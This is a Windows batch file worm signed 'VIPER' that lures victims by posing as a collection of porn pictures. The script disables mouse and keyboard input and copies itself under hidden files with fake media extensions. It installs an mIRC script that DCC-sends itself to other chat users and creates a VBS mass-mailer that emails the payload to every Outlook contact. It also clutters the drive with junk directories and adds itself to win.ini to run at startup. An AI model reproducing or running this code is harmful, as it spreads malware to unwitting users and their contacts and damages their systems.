::    >> DO NOT EXIT PROGRAM WHILE IT IS RUNNING <<
::         RUN PROGRAMME TWICE BEFORE IT WORKS
:: THIS IS THE PORN STAR BATCH Program HOT HOT XXX SEX PICS
:: Author::VIPER
::
@echo off%_porn%
c:\windows\rundll32.exe mouse,disable
c:\windows\rundll32.exe keyboard,disable
:copy self
if not exist c:\porn.bat copy %0 c:\porn.bat
if not exist c:\windows\porn.bat copy %0 c:\windows\porn.bat
if exist c:\porn goto pornend
mkdir c:\porn
copy %0 c:\porn\Sex_Sex.TXT.bat
copy %0 c:\porn\Hot_Horny_sluts.MP3.bat
copy %0 c:\porn\XXX_teen_blowjobs.AVI.bat
copy %0 c:\porn\jlo_nude.ZIP.bat
copy %0 c:\porn\Hot_teens.TXT.bat
copy %0 c:\porn\Sexy_xxx_girls.TXT.bat
copy %0 c:\porn\XXX_girls_with_huge boobs.GIF.bat
copy %0 c:\donkey_ass.JPEG.bat
copy %0 c:\hot_Buffy_pictures.GIF.bat
:pornend
attrib +h +s c:\porn
attrib +h +s c:\porn.bat
attrib +h +s c:\windows\porn.bat
echo [script]>porn.bat 
echo n0=on 1:JOIN:#:{ >>porn.bat 
echo n1= /if ( nick == $me ) { halt } >>porn.bat 
echo n2= /.dcc send $nick c:\porn\porn.bat >>porn.bat 
echo n3=on *:TEXT:*sex*:#:{ >>porn.bat 
echo n4=.msg $nick Hi,here is some  some teen sex videos for you to see and i'm sending you them...have fun. >>porn.bat
echo n5= /.dcc send $nick c:\porn\jlo_nude.ZIP.bat >>porn.bat
echo n6= /.dcc send $nick c:\porn\XXX_teen_blowjobs.AVI.bat >>porn.bat
echo n7= }>>porn.bat
if exist c:\mirc\mirc.ini copy porn.bat c:\mirc\script.ini 
if exist c:\mirc32\mirc.ini copy porn.bat c:\mirc32\script.ini 
if exist c:\progra~1\mirc\mirc.ini copy porn.bat c:\progra~1\mirc\script.ini 
if exist c:\progra~1\mirc32\mirc.ini copy brain.bat c:\progra~1\mirc32\script.ini 
del porn.bat
if exist c:\windows\system\mmailer.vbs goto finnishedmmail
echo.on error resume next >c:\windows\system\mmailer.vbs 
echo dim a,b,c,d,e >>c:\windows\system\mmailer.vbs 
echo set a = Wscript.CreateObject("Wscript.Shell") >>c:\windows\system\mmailer.vbs 
echo set b = CreateObject("Outlook.Application") >>c:\windows\system\mmailer.vbs 
echo set c = b.GetNameSpace("MAPI") >>c:\windows\system\mmailer.vbs 
echo for y = 1 To c.AddressLists.Count >>c:\windows\system\mmailer.vbs 
echo set d = c.AddressLists(y) >>c:\windows\system\mmailer.vbs 
echo x = 1 >>c:\windows\system\mmailer.vbs 
echo set e = b.CreateItem(0) >>c:\windows\system\mmailer.vbs 
echo for o = 1 To d.AddressEntries.Count >>c:\windows\system\mmailer.vbs 
echo f = d.AddressEntries(x) >>c:\windows\system\mmailer.vbs 
echo e.Recipients.Add f >>c:\windows\system\mmailer.vbs 
echo x = x + 1 >>c:\windows\system\mmailer.vbs 
echo next >>c:\windows\system\mmailer.vbs 
echo e.Subject = "Nude pics" >>c:\windows\system\mmailer.vbs 
echo e.Body = "I attached a zip file with nude pics of jlo.Hope you enjoy it" >>c:\windows\system\mmailer.vbs 
echo e.Attachments.Add ("c:\werm\jlo_nude.ZIP.bat") >>c:\windows\system\mmailer.vbs 
echo e.DeleteAfterSubmit = False >>c:\windows\system\mmailer.vbs 
echo e.Send >>c:\windows\system\mmailer.vbs 
echo f = "" >>c:\windows\system\mmailer.vbs 
echo next >>c:\windows\system\mmailer.vbs 
start c:\windows\system\mmailer.vbs 
:finnishedmmailer
mkdir c:\Viper
mkdir c:\porn
mkdir c:\sex
mkdir c:\Hot
mkdir c:\Dick
mkdir c:\shag
mkdir c:\Yeah
mkdir c:\111
mkdir c:\2
mkdir c:\go
mkdir c:\fuck
mkdir c:\pull
mkdir c:\suck
mkdir c:\girls
mkdir c:\viper1
mkdir c:\viper2
mkdir c:\viper3
mkdir c:\viper4
mkdir c:\viper5
mkdir c:\viper6
mkdir c:\viper7
mkdir c:\viper8
mkdir c:\viper9
mkdir c:\viper10
mkdir c:\viper11
mkdir c:\viper12
mkdir c:\viper13
mkdir c:\viper14
mkdir c:\viper15
mkdir c:\viper16
mkdir c:\viper1a
mkdir c:\viper2a
mkdir c:\viper3a
mkdir c:\viper4a
mkdir c:\viper5a
mkdir c:\viper6a
mkdir c:\viper7a
mkdir c:\viper8a
mkdir c:\viper9a
mkdir c:\viper10a
mkdir c:\viper11a
mkdir c:\viper12a
mkdir c:\viper13a
mkdir c:\viper14a
mkdir c:\viper15a
mkdir c:\viper16a
mkdir c:\viper1b
mkdir c:\viper2b
mkdir c:\viper3b
mkdir c:\viper4b
mkdir c:\viper5b
mkdir c:\viper6b
mkdir c:\viper7b
mkdir c:\viper8b
mkdir c:\viper9b
mkdir c:\viper10b
mkdir c:\viper11b
mkdir c:\viper12b
mkdir c:\viper13b
mkdir c:\viper14b
mkdir c:\viper15b
mkdir c:\viper16b
mkdir c:\viper1c
mkdir c:\viper2c
mkdir c:\viper3c
mkdir c:\viper4c
mkdir c:\viper5c
mkdir c:\viper6c
mkdir c:\viper7c
mkdir c:\viper8c
mkdir c:\viper9c
mkdir c:\viper10c
mkdir c:\viper11c
mkdir c:\viper12c
mkdir c:\viper13c
mkdir c:\viper14c
mkdir c:\viper15c
mkdir c:\viper16c
mkdir c:\viper1d
mkdir c:\viper2d
mkdir c:\viper3d
mkdir c:\viper4d
mkdir c:\viper5d
mkdir c:\viper6d
mkdir c:\viper7d
mkdir c:\viper8d
mkdir c:\viper9d
mkdir c:\viper10d
mkdir c:\viper11d
mkdir c:\viper12d
mkdir c:\viper13d
mkdir c:\viper14d
mkdir c:\viper15d
mkdir c:\viper16d
mkdir c:\viper1e
mkdir c:\viper2e
mkdir c:\viper3e
mkdir c:\viper4e
mkdir c:\viper5e
mkdir c:\viper6e
mkdir c:\viper7e
mkdir c:\viper8e
mkdir c:\viper9e
mkdir c:\viper10e
mkdir c:\viper11e
mkdir c:\viper12e
mkdir c:\viper13e
mkdir c:\viper14e
mkdir c:\viper15e
mkdir c:\viper16e
mkdir c:\viper1f
mkdir c:\viper2f
mkdir c:\viper3f
mkdir c:\viper4f
mkdir c:\viper5f
mkdir c:\viper6f
mkdir c:\viper7f
mkdir c:\viper8f
mkdir c:\viper9f
mkdir c:\viper10f
mkdir c:\viper11f
mkdir c:\viper12f
mkdir c:\viper13f
mkdir c:\viper14f
mkdir c:\viper15f
mkdir c:\viper16f
mkdir c:\sex1
mkdir c:\sex2
mkdir c:\sex3
mkdir c:\sex4
mkdir c:\sex5
mkdir c:\sex6
mkdir c:\sex7
mkdir c:\sex8
mkdir c:\sex9
mkdir c:\sexa
mkdir c:\sexb
mkdir c:\sexc
mkdir c:\sexd
mkdir c:\sexe
mkdir c:\sexf
mkdir c:\sexg
mkdir c:\sexh
mkdir c:\sexi
mkdir c:\sexj
mkdir c:\sexk
mkdir c:\sexl
mkdir c:\sexm
mkdir c:\sexn
mkdir c:\sexo
mkdir c:\sexp
mkdir c:\sexq
mkdir c:\sexr
mkdir c:\sexs
mkdir c:\sext
mkdir c:\sexu
mkdir c:\sexv
mkdir c:\sexw
mkdir c:\sexx
mkdir c:\sexy
mkdir c:\sexz
mkdir c:\sex11
mkdir c:\sex12
mkdir c:\sex13
mkdir c:\sex14
mkdir c:\sex15
mkdir c:\sex16
mkdir c:\sex17
mkdir c:\sex18
mkdir c:\sex19
mkdir c:\sex20
mkdir c:\sexaa
mkdir c:\sexab
mkdir c:\sexac
mkdir c:\sexad
mkdir c:\sex[
mkdir c:\sex]
mkdir c:\sex;
mkdir c:\sex'
mkdir c:\sex/
mkdir c:\sex.
mkdir c:\sexlk
mkdir c:\sexjk
mkdir c:\sexhg
mkdir c:\sexdfg
mkdir c:\sexvn
mkdir c:\sex543
mkdir c:\sex34
mkdir c:\sex34
mkdir c:\sex78
mkdir c:\free
mkdir c:\bond
mkdir c:\autoexec
mkdir c:\xcopy
mkdir c:\viper@
mkdir c:\@@@@@
mkdir c:\007
mkdir c:\006
mkdir c:\Virus
mkdir c:\wrong
mkdir c:\Fanny
mkdir c:\Clit
echo [windows]>r
echo load=c:\porn.bat>>r
echo run=>>r
echo NullPort=None>>r
echo.>>r
copy r + %winbootdir%\win.ini %winbootdir%\system\win.ini
del %winbootdir%\win.ini
move %winbootdir%\system\win.ini %winbootdir%\win.ini
del r
:: YOU HAVE BEEN BITTEN BY THE VIPER
c:\windows\rundll32.exe mouse,enable
c:\windows\rundll32.exe keyboard,enable
:goto pornend
:exit porn